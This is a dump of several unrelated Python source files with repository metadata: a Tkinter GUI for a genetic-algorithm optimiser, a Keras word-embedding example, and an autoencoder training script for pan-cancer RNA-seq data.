        for i, turns in enumerate(two_turn_examples):
            user_utt_1, user_utt_2 = turns
            # Send test messages to user
            socket_client.emit(
                '/message', {'sender': 'user', 'body': user_utt_1})
            response1 = get_received(socket_client)
            socket_client.emit(
                '/message', {'sender': 'user', 'body': user_utt_2})
            response2 = get_received(socket_client)
            # Write to output file: dialog index, then the alternating
            # user utterances and agent responses, blank-line separated.
            out_f.write(
                "\n".join(
                    ("dialog_idx %d" %
                     i,
                     user_utt_1,
                     *
                     response1,
                     user_utt_2,
                     *
                     response2)) +
                "\n\n")
            # Reset agent state so dialogs do not leak into each other.
            agent.reset()
    print("Finished writing examples to", out_fname)
5e64a87dd93b7d21172bf0a288a05134654a4e71 | 28,290 | py | Python | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | gui.py | gk2803/project01_ga | 856f19dea73e78b2dd21efcfa7b88dba541542a5 | [
"MIT"
] | null | null | null | import tkinter as tk
from tkinter import END
from tkinter import ttk
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg,
)
from gnt import *
from matplotlib.ticker import MaxNLocator
import threading
class MainWindow:
def __init__(self, root, color):
self.color = color
self.root = root
self.root.resizable(0, 0)
self.root.geometry("700x850")
self.root.title("Γενετικοί")
# self.root.columnconfigure(0,weight=1)
# self.root.rowconfigure(8, weight=1)
self.root.configure(bg=self.color)
"""Frames"""
self.top_frame = tk.Frame(
self.root,
width=450,
height=400,
pady=3,
bg=self.color,
relief=tk.RIDGE,
bd=8,
)
self.bot_frame = tk.Frame( # γραφική παράσταση και κάτω
self.root, width=450, height=400, pady=3, bg=self.color,
)
self.inner_frame = tk.Frame( # κάτω από τα sliders
self.top_frame,
width=450,
height=200,
pady=3,
relief=tk.RIDGE,
bd=3,
bg=self.color,
)
"""labels"""
# top_frame
variables_label = tk.Label( # Πεδία Ορισμού
self.top_frame,
text=" Πεδία Ορισμού ",
fg="#000000",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
function_label = tk.Label( # Συνάρτηση
self.top_frame,
text="Συνάρτηση",
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
population_label = tk.Label(
self.top_frame,
text="Πληθυσμός", # Πληθυσμός
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
generations_label = tk.Label(
self.top_frame, # Γενιές
text="Γενιές",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pm_label = tk.Label( # Π. Μετάλλξης
self.top_frame,
text="Π. Μετάλλαξης",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pc_label = tk.Label( # Π. Διασταύρωσης
self.top_frame,
text="Π. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
cp_label = tk.Label( # Σημ. Διασταύρωσης
self.top_frame,
text="Σημ. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
bits_label = tk.Label( # bits
self.top_frame,
text="Bits",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
selection_label = tk.Label( # Τελεστής Επιλογής
self.top_frame,
text="Τελεστής Επιλογής",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
self.bounds_label = tk.Label( # label που εμφανίζει ΤΙΚ σε περίπτωση σωστής καταχώρησης πεδίου ορισμού, διαφορετικά Χ
self.top_frame,
text="",
bg=self.color,
)
# top frame - sliders
self.pop_slider = tk.Scale( # πληθυσμός
self.top_frame,
from_=2,
to=500,
resolution=2,
orient="horizontal",
bg=self.color,
)
self.generation_slider = tk.Scale( # Γενιές
self.top_frame,
from_=2,
to=1000,
resolution=1,
orient="horizontal",
bg=self.color,
)
self.pm_slider = tk.Scale( # π. διασταύρωσης
self.top_frame,
from_=0,
to=1,
resolution=0.001,
orient="horizontal",
bg=self.color,
)
self.pc_slider = tk.Scale( # π. μετάλλαξης
self.top_frame,
from_=0,
to=1,
resolution=0.01,
orient="horizontal",
bg=self.color,
)
self.bits_slider = tk.Scale( # bits
self.top_frame,
from_=2,
to=40,
resolution=1,
orient="horizontal",
command=self.update_scale,
bg=self.color,
)
self.cp_slider = tk.Scale( # σημ. διαστάυρωσης
self.top_frame,
from_=1,
to=self.bits_slider.get(),
resolution=1,
orient="horizontal",
bg=self.color,
)
###################################################################################################################
################################## DROPDOWN ###################################################################
###################################################################################################################
# top frame - dropdowns
self.bounds_var = tk.StringVar(self.top_frame) #μεταβλητή δευτέρου dropdown-menu, (x,y,z)
self.bounds_input = tk.StringVar() #εισαχθέντα από τον χρήστη πεδία ορισμού
self.var_number = tk.IntVar() #αριθμός μεταβλητών - πρώτο dropdown-menu
self.function_entry = tk.StringVar() #είσοδος συνάρτησης
self.radio_var = tk.IntVar() #μεταβλητή τελεστή επιλογής
self.choices = {
"x": "0,10",
"y": "0,20",
"z": "0,30"
}
self.option = tk.OptionMenu(self.top_frame, self.bounds_var, *self.choices)
self.option2 = tk.OptionMenu(self.top_frame, self.var_number, *[*range(1,4)],command=self.set_vars )
# function
self.function = ttk.Combobox(self.top_frame, textvariable=self.function_entry,width=35,height=10)
self.func_dict = {
'Beale function':'(1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2',
'Booth function':'(x+2*y-7)**2 +(2*x +y -5)**2',
'Matyas function':'0.26*(x**2+y**2)-0.48*x*y',
'Himmelblau\'s function':'(x**2+y-11)**2 + (x+y**2-7)**2',
'Three-hump camel function':'2*x**2-1.05*x**4+x**6/6+x*y+y**2',
'project function':'x**2 + y**3 + z**4 + x*y*z'
}
#adding combobox drop down list
self.function['values']=list(self.func_dict.keys())
self.function.bind("<<ComboboxSelected>>",self.boxcallbackFunc)
# bounds
self.vars_entry = tk.Entry(
self.top_frame, width=10, font="Courier", text=self.bounds_input, justify='center'
)
self.vars_entry.bind("<Return>", self.bind_func)
# radio buttons
self.tourn_button = tk.Radiobutton(
self.top_frame, bg=self.color, text="Tournament", variable=self.radio_var, value=1
)
self.roulette_button = tk.Radiobutton(
self.top_frame,
bg=self.color,
text="Roulette wheel",
variable=self.radio_var,
value=2,
)
###################################################################################################################
# inner frame
cur_label = tk.Label( # Τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label = tk.Label( # best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
gener_label = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
best_label = tk.Label( # Best fitness
self.inner_frame,
text="Best Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
average_label = tk.Label( # Average fitness
self.inner_frame,
text="Average Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
gener_label2 = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x0 = tk.Label( # x
self.inner_frame,
text="x",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x1 = tk.Label( # y
self.inner_frame,
text="y",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x2 = tk.Label( # z
self.inner_frame,
text=" z ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
cur_label2 = tk.Label( # τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label2 = tk.Label( # Best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
self.gener_output = tk.Label( # Output Τρέχων - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_output = tk.Label( # Output τρέχων - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.avg_output = tk.Label( # Output τρέχων - average fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_gen_output = tk.Label( # output Best - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_sol_output = tk.Label( # output Best - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.gener2_output = tk.Label( # output Τρέχων - Γενιά (δεύτερο μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x0_output = tk.Label( # output Τρέχων - X
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x1_output = tk.Label( # output Τρέχων - Y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x2_output = tk.Label( # output Τρέχων - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x_outputs =[self.x0_output, self.x1_output, self.x2_output]
self.best_gener2_output = tk.Label( # output Best - Γενιά (κάτω μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x0_output = tk.Label( # output Best - x
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x1_output = tk.Label( # output Best - y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x2_output = tk.Label( # output Best - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.bestx_output =[self.best_x0_output, self.best_x1_output, self.best_x2_output]
# bottom frame
self.maximize_button = tk.Button( # maximize button
self.bot_frame,
text="maximize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.maximize).start(),
relief='ridge'
)
self.minimize_button = tk.Button( # minimize button
self.bot_frame,
text="minimize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.minimize).start(),
relief='ridge'
)
exit_button = tk.Button( # exit butotn
self.bot_frame,
text="exit",
width=10,
font="Courier 14",
command=self.root.destroy,
relief='ridge'
)
# canvas
self.fig = plt.Figure(figsize=(7, 4), dpi=100, facecolor="#efebe9")
self.canvas = FigureCanvasTkAgg( # plot
self.fig,
master=self.bot_frame,
)
self.axes = self.fig.add_subplot(111)
############################################################################################################
###################################### GRIDS ############################################################
############################################################################################################
'''grids'''
# frames
self.inner_frame.grid(row=7, columnspan=5, sticky="nsew")
self.top_frame.grid(row=0)
self.bot_frame.grid(row=1)
self.inner_frame.columnconfigure(2, weight=3)
# top frame
variables_label.grid(row=0, column=0, sticky="nsew") # dropdown αριθμός μεταβλητών
generations_label.grid(row=4, column=0, sticky="nsew") # Γενιές label
population_label.grid(row=0, column=1, sticky="nsew") # Πληθυσμός label
cp_label.grid(row=0, column=2, sticky="nsew") # Σημ. Διασταύρωσης label
function_label.grid(row=2, column=0, sticky="nsew") # Συνάρτηση label
pc_label.grid(row=2, column=1, sticky="nsew") # Π. Διασταύρωσης label
bits_label.grid(row=2, column=2, sticky="nsew") # Bits label
pm_label.grid(row=4, column=1, sticky="nsew") # Π. Μετάλλαξης label
selection_label.grid(row=4, column=2, sticky="nsew") # Τελεστής επιλογής label
self.bounds_label.grid(row=1, column=0,sticky=tk.E ) # ΤΙΚ / Χ label
# inner
cur_label.grid(row=1, column=0) # Τρέχων label (πρώτο μπλοκ)
bestest_label.grid(row=2, column=0) # Best label (πρώτο μπλοκ)
gener_label.grid(row=0, column=1) # Γενιά label (πρώτο μπλοκ)
best_label.grid(row=0, column=2) # Best Fitness label
average_label.grid(row=0, column=3, columnspan=2, sticky="nsew") # Average fitness label
gener_label2.grid(row=3, column=1) # Γενιά label (δεύτερο μπλοκ)
x0.grid(row=3, column=2, sticky="nsew") # x label (δεύτερο μπλοκ)
x1.grid(row=3, column=3, columnspan=2, sticky="nsew") # y label (δεύτερο μπλοκ)
x2.grid(row=3, column=5,sticky='nsew',columnspan=3) # z label (δεύτερο μπλοκ)
cur_label2.grid(row=4, column=0) # Τρέχων label (δεύτερο μπλοκ)
bestest_label2.grid(row=5, column=0) # Best label (δεύτερο μπλοκ)
# outputs
self.gener_output.grid(row=1, column=1) # Τρέχων - γενιά, output (πρώτο μπλοκ)
self.best_output.grid(row=1, column=2) # Τρέχων - Best Fitness, output (πρώτο μπλοκ)
self.avg_output.grid(row=1, column=3) # Τρέχων - Average Fitness, output (πρώτο μπλοκ)
self.best_gen_output.grid(row=2, column=1) # Best -Γενιά, output (πρώτο μπλοκ)
self.best_sol_output.grid(row=2, column=2) # Best - Best Fitness, output (πρώτο μπλοκ)
self.gener2_output.grid(row=4, column=1) # Τρέχων - Γενιά, output (δεύτερο μπλοκ)
self.x0_output.grid(row=4, column=2) # Τρέχων - X output (δεύτερο μπλοκ)
self.x1_output.grid(row=4, column=3) # Τρέχων - Y output (δεύτερο μπλοκ)
self.x2_output.grid(row=4, column=5) # Τρέχων - Z output (δεύτερο μπλοκ)
self.best_gener2_output.grid(row=5, column=1) # Best - Γενιά, output (δεύτερο μπλοκ)
self.best_x0_output.grid(row=5, column=2) # Best - X, output (δεύτερο μπλοκ)
self.best_x1_output.grid(row=5, column=3) # Best - Y, output (δεύτερο μπλοκ)
self.best_x2_output.grid(row=5, column=5) # Best - Z, output (δεύτερο μπλοκ)
# sliders
self.pop_slider.grid(row=1, column=1,sticky='nsew') # πληθυσμός
self.generation_slider.grid(row=5, column=0,sticky='nsew') # γενιές
self.pm_slider.grid(row=5, column=1,sticky='nsew') # π. μετάλλαξης
self.pc_slider.grid(row=3, column=1,sticky='nsew') # π. διασταύρωσης
self.bits_slider.grid(row=3, column=2,) # bits
self.cp_slider.grid(row=1, column=2,) # σημ. διασταύρωσης
# dropdown bounds
self.option.grid(row=1, column=0,padx=(0,50) ) # Πεδία ορισμού δεύτερο dropdown-menu (x,y,z)
self.option2.grid(row=1, column=0, sticky=tk.W) # Πεδία ορισμού πρώτο dropdown-menu (1,2,3)
# function entry
self.function.grid(row=3, column=0,) # συνάρτηση
#bounds entry
self.vars_entry.grid(row=1, column=0, padx=(110,0)) # Πεδία ορισμού - Είσοδος πεδίων όρισμού
# buttons
self.maximize_button.grid(row=2, column=0, sticky=tk.W) # maximize
self.minimize_button.grid(row=2, column=1) # minimize
exit_button.grid(row=2, column=2, sticky=tk.E) # exit
# radio buttons
self.tourn_button.grid(row=5, column=2) # radio - tournament
self.roulette_button.grid(row=6, column=2) # radio - roulette wheel
# canvas
self.canvas.get_tk_widget().grid(row=0, column=0, columnspan=3) # graph
"""αρχικοποίηση τιμών"""
self.pop_slider.set(100)
self.generation_slider.set(150)
self.pm_slider.set(0.01)
self.pc_slider.set(0.8)
self.bits_slider.set(30)
self.var_number.set(3)
self.bounds_input.set("0,10")
self.radio_var.set(1)
self.bounds_var.set(list(self.choices.keys())[0])
self.function.set("x**2 + y**3 + z**4 + x*y*z")
"""traced var"""
self.bounds_var.trace("w", self.bounds_f)
"""mainloop"""
self.root.mainloop()
#
def set_vars(self,event):
"""
καθορίζει τον αριθμό των μεταβλητών,
ενημερώνει ανάλογα το dropdown menu των μεταβλητών x-y-z
"""
menu = self.option.children["menu"]
menu.delete(0,"end")
n = self.var_number.get()
t=['x','y','z']
t=[t[i] for i in range(n)]
#initializes bounds
self.choices = dict(zip(t,["-10,10"]*n))
#creates the second drop down menu
for val in self.choices.keys():
menu.add_command(label=val, command=tk._setit(self.bounds_var,val))
self.bounds_var.set(list(self.choices.keys())[0])
def boxcallbackFunc(self,event):
"""
τοποθετεί σαν input το value του λεξικού έτοιμων συναρτήσεων
https://www.etutorialspoint.com/index.php/347-python-tkinter-ttk-combobox-event-binding
"""
self.function = event.widget.get()
self.function_entry.set(self.func_dict[self.function])
def bind_func(self, event):
"""
στο <enter> εμφανίζει κατάλληλο μήνυμα για αποδοχή ή όχι των πεδίων ορισμού,
παράλληλα ενημερώνει το λεξικό self.choices με τα αποδεκτά πεδία ορισμού
"""
if not self.mk_int(self.vars_entry.get()):
self.bounds_label.config(text="❌", font="Courier", fg="red")
else:
self.bounds_label.config(text="✓", font="Courier", fg="green")
self.choices[self.bounds_var.get()] = self.vars_entry.get()
def bounds_f(self, *args):
"""trace var method"""
var2_ = self.choices[self.bounds_var.get()]
self.bounds_input.set(var2_)
self.bounds_label.config(text="")
def update_scale(self, new_max):
"""configures slider's max val"""
self.cp_slider.configure(to=int(new_max) - 1)
@staticmethod
def mk_int(s):
"""επιστρέφει True αν τα πεδία ορισμού είναι αποδεκτά, διαφορετικά False"""
try:
x, y = s.split(",")
if int(x) >= int(y):
raise ValueError
return True
except ValueError:
return False
def extract_bounds(self, dict) -> list:
"""
επιστρέφει τα πεδία ορισμού σε μορφή λίστας
"""
return [list(map(int, dict[val].split(","))) for val in dict if dict[val] != ""]
def graph(self, y1, y2):
"""plots"""
self.fig.clear()
self.axes = self.fig.add_subplot(111)
self.axes.plot(y1, "g", label="average fitness")
self.axes.plot(y2, "r", label="max fitness")
self.axes.set_ylabel("fitness")
self.axes.set_xlabel("generations")
self.axes.yaxis.set_label_position("right")
# legend options
self.axes.legend(
bbox_to_anchor=(0.5, 1.1),
loc="upper center",
ncol=2,
fancybox=True,
shadow=True,
)
# forces integer spacing between generations
self.axes.xaxis.set_major_locator(MaxNLocator(integer=True))
self.canvas.draw()
def minimize(self):
'''minimize button'''
self.objective_function = f"-1*({self.function_entry.get()})"
self.run()
def maximize(self):
'''maximize button'''
self.objective_function = self.function_entry.get()
self.run()
def dreamcatcher(self):
"""tries to catch exceptions a man can only dream of"""
try:
self.bounds = self.extract_bounds(self.choices)
if not any(k in self.objective_function for k in list(self.choices.keys())):
raise Exception("Καμία μεταβλητή")
for key in self.choices.keys():
if self.choices[key] == "" and key in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
for key in self.choices.keys():
if self.choices[key] != "" and key not in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
self.generations = self.generation_slider.get()
ga = GeneticAlgorithm(
self.pop_slider.get(),
self.bits_slider.get(),
self.bounds,
self.pm_slider.get(),
self.pc_slider.get(),
self.cp_slider.get(),
eval("lambda x=0,y=0,z=0:" + self.objective_function),
)
return ga
except Exception as e:
print(e)
return
def run_helper(self,n,ga,output):
for i in range(n):
output[i].configure(text='{:.2f}'.format(ga.best().real_genes[i]))
def clear_outputs(self):
"""καθαριζει τα πεδια εξοδου"""
self.gener_output.configure(text="")
self.x0_output.configure(text="")
self.x1_output.configure(text="")
self.x2_output.configure(text="")
self.best_x0_output.configure(text="")
self.best_x1_output.configure(text="")
self.best_x2_output.configure(text="")
def run(self):
"""run buttom"""
ga = self.dreamcatcher()
if ga:
self.clear_outputs()
ga.run(self.radio_var.get())
b = [ga.best().fitness]
a = [ga.fitness_average]
self.best = b[0]
self.best_index = 1
for i in range(1, self.generations):
self.run_helper(len(self.bounds),ga,self.x_outputs)
self.gener_output.configure(text=i + 1)
self.gener2_output.configure(text=i + 1)
ga.run(self.radio_var.get())
b.append(ga.best().fitness)
self.best_output.configure(text=float("{:.2f}".format(b[i])))
a.append(ga.fitness_average)
self.avg_output.configure(text=float("{:.2f}".format(a[i])))
if self.best < ga.best().fitness:
self.best = ga.best().fitness
self.best_index = i + 1
self.best_sol_output.configure(text=float("{:.2f}".format(self.best)))
self.best_gen_output.configure(text=self.best_index)
self.best_gener2_output.configure(text=self.best_index)
self.run_helper(len(self.bounds), ga, self.bestx_output)
self.graph(a, b)
self.fig.clear()
def main():
root = tk.Tk()
window = MainWindow(root, "#efebe9")
main()
| 35.540201 | 146 | 0.471227 | 2,951 | 28,290 | 4.416808 | 0.141986 | 0.028464 | 0.032914 | 0.035906 | 0.473377 | 0.33451 | 0.247276 | 0.211984 | 0.207074 | 0.195412 | 0 | 0.026906 | 0.386462 | 28,290 | 795 | 147 | 35.584906 | 0.723915 | 0.117922 | 0 | 0.418124 | 0 | 0.009539 | 0.074197 | 0.005963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025437 | false | 0 | 0.012719 | 0 | 0.047695 | 0.00159 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e64ae25a77784fd4b7b20e3342337ee39e59146 | 1,027 | py | Python | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 10 14:59:45 2021
@author: ASUS
"""
# Word Embedding Techniques using Embedding Layer in Keras
from tensorflow.keras.preprocessing.text import one_hot
sent=[ 'the glass of milk',
'the glass of juice',
'the cup of tea',
'I am a good boy',
'I am a good developer',
'understand the meaning of words',
'your videos are good',
'a king',
'a queen']
# Vocabulary size
voc_size = 10000
# One hot representation
onehot_repr = [one_hot(words,voc_size) for words in sent]
# Word Embedding Representation
from tensorflow.keras.layers import Embedding
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Sequential
sent_len = 8
embedded_docs = pad_sequences(onehot_repr,padding = 'pre',maxlen = sent_len)
dim = 10
model = Sequential()
model.add(Embedding(voc_size,dim,input_length=sent_len))
model.compile(optimizer = 'adam', loss = 'mse')
model.summary()
model.predict(embedded_docs)[[7,8]]
| 22.822222 | 76 | 0.720545 | 150 | 1,027 | 4.833333 | 0.553333 | 0.077241 | 0.104828 | 0.088276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026995 | 0.170399 | 1,027 | 44 | 77 | 23.340909 | 0.823944 | 0.193768 | 0 | 0 | 0 | 0 | 0.194853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e66acc250bc25deceb509ba5cc57131ce35b37b | 6,262 | py | Python | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 141 | 2017-08-16T22:52:48.000Z | 2022-02-01T21:26:51.000Z | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 73 | 2017-08-10T13:18:49.000Z | 2022-01-10T03:07:32.000Z | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 60 | 2017-11-18T13:18:52.000Z | 2022-03-12T20:52:58.000Z | """
Gregory Way 2017
Variational Autoencoder - Pan Cancer
scripts/adage_pancancer.py
Comparing a VAE learned features to ADAGE features. Use this script within
the context of a parameter sweep to compare performance across a grid of
hyper parameters.
Usage:
Run in command line with required command arguments:
python scripts/adage_pancancer.py --learning_rate
--batch_size
--epochs
--sparsity
--noise
--output_filename
--num_components
Typically, arguments to this script are compiled automatically by:
python scripts/vae_paramsweep.py --parameter_file <parameter-filepath>
--config_file <configuration-filepath>
Output:
Loss and validation loss for the specific model trained
"""
import os
import argparse
import numpy as np
import pandas as pd
from keras.engine.topology import Layer
from keras.layers import Input, Dense, Dropout, Activation
from keras.models import Sequential, Model
import keras.backend as K
from keras.regularizers import l1
from keras import optimizers, activations
class TiedWeightsDecoder(Layer):
"""
Transpose the encoder weights to apply decoding of compressed latent space
"""
def __init__(self, output_dim, encoder, activation=None, **kwargs):
self.output_dim = output_dim
self.encoder = encoder
self.activation = activations.get(activation)
super(TiedWeightsDecoder, self).__init__(**kwargs)
def build(self, input_shape):
self.kernel = self.encoder.weights
super(TiedWeightsDecoder, self).build(input_shape)
def call(self, x):
# Encoder weights: [weight_matrix, bias_term]
output = K.dot(x - self.encoder.weights[1],
K.transpose(self.encoder.weights[0]))
if self.activation is not None:
output = self.activation(output)
return output
def compute_output_shape(self, input_shape):
return (input_shape[0], self.output_dim)
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--learning_rate',
help='learning rate of the optimizer')
parser.add_argument('-b', '--batch_size',
help='Number of samples to include in each learning batch')
parser.add_argument('-e', '--epochs',
help='How many times to cycle through the full dataset')
parser.add_argument('-s', '--sparsity',
help='How much L1 regularization penalty to apply')
parser.add_argument('-n', '--noise',
help='How much Gaussian noise to add during training')
parser.add_argument('-f', '--output_filename',
help='The name of the file to store results')
parser.add_argument('-c', '--num_components', default=100,
help='The latent space dimensionality to test')
parser.add_argument('-o', '--optimizer', default='adam',
help='optimizer to use', choices=['adam', 'adadelta'])
parser.add_argument('-w', '--untied_weights', action='store_false',
help='use tied weights in training ADAGE model')
args = parser.parse_args()
# Set hyper parameters
learning_rate = float(args.learning_rate)
batch_size = int(args.batch_size)
epochs = int(args.epochs)
sparsity = float(args.sparsity)
noise = float(args.noise)
output_filename = args.output_filename
latent_dim = int(args.num_components)
use_optimizer = args.optimizer
tied_weights = args.untied_weights
# Random seed
seed = int(np.random.randint(low=0, high=10000, size=1))
np.random.seed(seed)
# Load Data
rnaseq_file = os.path.join('data', 'pancan_scaled_zeroone_rnaseq.tsv.gz')
rnaseq_df = pd.read_table(rnaseq_file, index_col=0)
original_dim = rnaseq_df.shape[1]
# Split 10% test set randomly
test_set_percent = 0.1
rnaseq_test_df = rnaseq_df.sample(frac=test_set_percent)
rnaseq_train_df = rnaseq_df.drop(rnaseq_test_df.index)
if tied_weights:
# Input place holder for RNAseq data with specific input size
encoded_rnaseq = Dense(latent_dim,
input_shape=(original_dim, ),
activity_regularizer=l1(sparsity),
activation='relu')
dropout_layer = Dropout(noise)
tied_decoder = TiedWeightsDecoder(input_shape=(latent_dim, ),
output_dim=original_dim,
activation='sigmoid',
encoder=encoded_rnaseq)
autoencoder = Sequential()
autoencoder.add(encoded_rnaseq)
autoencoder.add(dropout_layer)
autoencoder.add(tied_decoder)
else:
input_rnaseq = Input(shape=(original_dim, ))
encoded_rnaseq = Dropout(noise)(input_rnaseq)
encoded_rnaseq_2 = Dense(latent_dim,
activity_regularizer=l1(sparsity))(encoded_rnaseq)
activation = Activation('relu')(encoded_rnaseq_2)
decoded_rnaseq = Dense(original_dim, activation='sigmoid')(activation)
autoencoder = Model(input_rnaseq, decoded_rnaseq)
if use_optimizer == 'adadelta':
optim = optimizers.Adadelta(lr=learning_rate)
elif use_optimizer == 'adam':
optim = optimizers.Adam(lr=learning_rate)
autoencoder.compile(optimizer=optim, loss='mse')
hist = autoencoder.fit(np.array(rnaseq_train_df), np.array(rnaseq_train_df),
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(np.array(rnaseq_test_df),
np.array(rnaseq_test_df)))
# Save training performance
history_df = pd.DataFrame(hist.history)
history_df = history_df.assign(num_components=latent_dim)
history_df = history_df.assign(learning_rate=learning_rate)
history_df = history_df.assign(batch_size=batch_size)
history_df = history_df.assign(epochs=epochs)
history_df = history_df.assign(sparsity=sparsity)
history_df = history_df.assign(noise=noise)
history_df = history_df.assign(seed=seed)
history_df.to_csv(output_filename, sep='\t')
| 37.497006 | 79 | 0.6565 | 749 | 6,262 | 5.291055 | 0.319092 | 0.036336 | 0.038607 | 0.031794 | 0.078224 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00617 | 0.249441 | 6,262 | 166 | 80 | 37.722892 | 0.837021 | 0.203449 | 0 | 0 | 0 | 0 | 0.117967 | 0.007058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037736 | false | 0 | 0.09434 | 0.009434 | 0.160377 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e66c35eab5b6d8658cea2e23d962d4c0b9705ad | 6,770 | py | Python | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 16 | 2019-11-28T18:05:21.000Z | 2021-12-08T18:09:18.000Z | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 1,127 | 2019-11-29T08:57:25.000Z | 2022-03-31T20:21:32.000Z | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 10 | 2019-11-28T18:05:06.000Z | 2022-01-13T06:16:40.000Z | # Licensed to the Apache Software Foundation (ASF) under one
